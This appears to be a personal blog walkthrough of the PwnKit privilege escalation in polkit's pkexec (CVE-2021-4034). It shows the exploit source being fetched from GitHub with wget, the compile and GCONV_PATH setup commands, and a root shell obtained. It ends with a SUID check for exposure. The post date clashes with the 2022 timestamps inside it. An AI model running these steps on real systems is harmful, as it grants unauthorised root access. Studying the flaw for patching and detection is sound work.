Home Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)
Post
Cancel

Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)

Posted Dec 25, 2021 2 min read

PwnKit (CVE-2021-4034) - Local Privilege Escalation This will be a short one. It’s about local privilege escalation vulnerability (CVE-2021-4034) with public available exploit named PwnKit.

Original Post: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt

Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged ones. […] It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission).” (Wikipedia)

Since pkexec is installed on almost every Linux system and pkexec almost always has SUID-bit set it means that vulnerability that is “that” trivial to exploit (…once it’s known how…) is really bad.

So let’s try one of the exploits available on GitHub: https://github.com/berdav/CVE-2021-4034

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

[luka@localhost shm]$ wget https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/pwnkit.c
...
Saving to: ‘pwnkit.c’

100%[===================================================================================================================================================================================================>] 266         --.-K/s   in 0s

2022-01-27 07:14:47 (15.8 MB/s) - ‘pwnkit.c’ saved [266/266]

[luka@localhost shm]$ wget https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.c
...
Saving to: ‘cve-2021-4034.c’

100%[===================================================================================================================================================================================================>] 274         --.-K/s   in 0s

2022-01-27 07:14:51 (10.9 MB/s) - ‘cve-2021-4034.c’ saved [274/274]

After having cve-2021-4034.c and pwnkit.c on the system. Root is only few commands away. (Exploit needs compilation!). Its also possible to use Makefile to make it even more easier (kudos to https://github.com/berdav).

1
2
3
4
5
6

[luka@localhost shm]$ cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
[luka@localhost shm]$ cc -Wall cve-2021-4034.c -o cve-2021-4034
[luka@localhost shm]$ echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
[luka@localhost shm]$ mkdir -p GCONV_PATH=.
[luka@localhost shm]$ cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
[luka@localhost shm]$

So that’s it. Exploit is compiled and everything has been set (read about the exploit on the original page for more information how it works)

1
2
3
4
5
6
7
8
9

[luka@localhost shm]$ whoami
luka
[luka@localhost shm]$ id
uid=1000(luka) gid=1000(luka) groups=1000(luka),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[luka@localhost shm]$ ./cve-2021-4034
sh-4.2# id
uid=1000(luka) gid=1000(luka) euid=0(root) groups=1000(luka),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# whoami
root

So that’s it. Trivial to exploit - check if your system is exploitable (if it has SUID bit set on pkexec binary).

1
2
3
4

[luka@localhost shm]$ find / -perm /4000 2>/dev/null
...
/usr/bin/pkexec
...

…yes you can add | grep pkexec at the end

Blogging
CVE-2021-44228 Log4J
This post is licensed under CC BY 4.0 by the author.
Recently Updated